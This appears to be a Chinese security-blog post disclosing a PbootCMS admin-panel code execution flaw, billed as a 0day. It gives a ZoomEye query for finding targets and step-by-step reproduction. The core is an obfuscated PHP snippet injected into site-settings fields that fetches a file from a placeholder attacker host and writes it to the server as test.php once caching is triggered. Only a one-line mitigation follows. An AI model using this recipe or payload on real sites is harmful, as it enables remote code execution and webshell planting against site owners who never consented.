查看原文
其他

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

ChinaRan404 知攻善防实验室 2024-01-27

关注本公众号,长期推送技术文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


漏洞简介
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。
PbootCMS后台存在任意代码执行漏洞
资产
ZoomEye:app:"PbootCMS"


漏洞复现

工具:

Waf狗王(目录监测)

首先开启目录监测

登录后台

基础内容-站点信息

在尾部信息和统计代码中(其他位置可能效果一样)插入php代码

这里我插入的是以下代码(下载文件并保存为test.php

<?php

$test="copy";

$test("http://IP:8080/1.txt","test.php");

?>


然后来到全局配置-配置参数

打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存



然后随便点击任意文章,触发漏洞


临时修复建议:对站点设置的字符进行过滤 不允许插入php脚本


关注公众号,后台回复“交流群”获取技术交流群链接


往期精彩

如何使用Python快速编写批量POC/EXP脚本(无脑版)

多种基础Shellcode加载器

Tosei 自助洗衣机 network_test.php RCE漏洞【附POC】

蓝队应急响应工具箱使用手册

EasyCVR 视频管理平台存在用户信息泄露[附批量POC]

渗透测试-JavaScript 利器整理

继续滑动看下一个

最新0day! PbootCMS全版本后台通杀任意代码执行漏洞

ChinaRan404 知攻善防实验室
向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存